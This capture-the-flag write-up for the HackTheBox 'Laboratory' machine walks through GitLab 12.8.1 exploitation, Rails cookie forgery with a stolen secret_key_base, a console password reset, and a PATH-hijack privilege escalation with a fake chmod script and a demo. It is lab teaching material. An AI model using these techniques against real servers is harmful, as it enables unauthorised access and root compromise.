# HackTheBox-Laboratory
## Rustscan
```
rustscan -a 10.10.10.216 -- -A -sC -sV
Open 10.10.10.216:22
Open 10.10.10.216:80
Open 10.10.10.216:443
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Issuer: commonName=laboratory.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
```
## PORT 80/443 (HTTP/HTTPS)
On visiting port 80 I was redirected to HTTPS with the domain `laboratory.htb`, so let's add it to `/etc/hosts`.
Running dirsearch was pointless because it couldn't find anything.
But I did see a second hostname in the nmap scan, `git.laboratory.htb`, in the certificate's Subject Alternative Name; after adding it to `/etc/hosts` as well, it serves a GitLab instance.
We can't sign in since we haven't found any users, so I registered an account.
After logging in we don't see anything useful, but the help page shows the GitLab version, which is 12.8.1.
Searching for an exploit for this version I found an RCE:
https://github.com/dotPY-hax/gitlab_RCE
I edited the email in the payload, but the shell it gave was not stable.
Through that unstable shell I grabbed `secrets.yml` and also realised that this was a Docker container. The `secret_key_base` in `secrets.yml` is what turns the arbitrary file read into code execution: with it an attacker can forge a signed Rails session cookie that the server deserializes.
Since the shell was unstable I decided to go for Metasploit, whose module chains the file read and the cookie forgery for you:
https://www.rapid7.com/db/modules/exploit/multi/http/gitlab_file_read_rce/
These are the options you would have to set:
And we get a bash prompt.
To get a more stable shell:
I searched for `pentesting gitlab` and found a website with some juicy information about what to look for.
I saw a user `dexter` who had a repository, but there wasn't anything interesting in it. Looking back at that directory I saw two files with `secret` in their names.
I didn't find anything there, then I came across a report submitted on HackerOne regarding GitLab:
https://hackerone.com/reports/493324
But this didn't work, so I searched for `gitlab shell change user password` and found the documentation.
After going through it I learned that anyone with shell access to the GitLab host can reset a user's password from the Rails console (`gitlab-rails console`): load the user, set `password` and `password_confirmation`, and save. With a shell inside the GitLab container, that is exactly what we have.
And we are logged in as `dexter`.
We see an SSH key, so we can log in as `dexter` over SSH.
There was a cron job running, but I couldn't run docker because we don't have permission to execute it.
So here I spent a lot of time running `linpeas` and going through folders manually, but found nothing; then I looked for SUID binaries.
We see that it calls `chmod` by name rather than by absolute path, so we can exploit the PATH variable: put a fake `chmod` in a directory we control and place that directory first in `PATH`, so the SUID binary executes our script instead of the real one.
```
#!/bin/bash
# Fake `chmod`: drop it in a directory that comes first in PATH so the SUID binary runs it instead of /bin/chmod.
bash
```
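The PATH hijack end to end, as an added example that is not part of the original writeup. It simulates the vulnerable SUID helper with a constructed script (the box's actual binary is not reproduced) and runs unprivileged in a temporary directory; the planted `chmod` writes a marker instead of spawning a shell so the result can be checked, and a control run with the untouched `PATH` shows the real `chmod` being used.

```shell
#!/bin/sh
# Added example (not code from the writeup): PATH hijacking against a program that
# calls `chmod` by bare name. Runs unprivileged in a scratch dir; on the box the
# caller is a SUID binary, so the planted `chmod` would run with its privileges.
set -u
WORK=$(mktemp -d)

# Stand-in for the vulnerable helper (constructed; the box's SUID binary is not
# reproduced). The bug: `chmod` is resolved through PATH, not called as /bin/chmod.
make_victim() {
    cat > "$WORK/victim" <<'EOF'
#!/bin/sh
touch "$1"
chmod 700 "$1"
EOF
    chmod +x "$WORK/victim"
}

# Plant a fake `chmod` in a directory we control. The writeup's payload starts an
# interactive bash; here it writes a marker so the hijack can be verified.
plant_fake_chmod() {
    mkdir -p "$WORK/bin"
    cat > "$WORK/bin/chmod" <<EOF
#!/bin/sh
echo "hijacked: chmod \$*" > "$WORK/marker"
EOF
    chmod +x "$WORK/bin/chmod"
}

# Run the victim with our directory first in PATH; succeeds if the fake chmod ran.
run_hijack() {
    make_victim
    plant_fake_chmod
    rm -f "$WORK/marker"
    PATH="$WORK/bin:$PATH" "$WORK/victim" "$WORK/target"
    [ -f "$WORK/marker" ]
}

# Control run with the unmodified PATH: the real chmod runs and no marker appears.
run_without_hijack() {
    make_victim
    rm -f "$WORK/marker"
    "$WORK/victim" "$WORK/target2"
    [ ! -f "$WORK/marker" ]
}

# Stand-alone demonstration: prints the hijacked invocation.
if run_hijack; then cat "$WORK/marker"; fi
```

The planted command runs with whatever uid the caller has. If the SUID binary only changes the effective uid, a plain `bash` drops it back to the real uid; `bash -p` keeps it. The fix on the defending side is the mirror image: call `/bin/chmod` by absolute path, or set `PATH` to a fixed trusted value before any `system()` call.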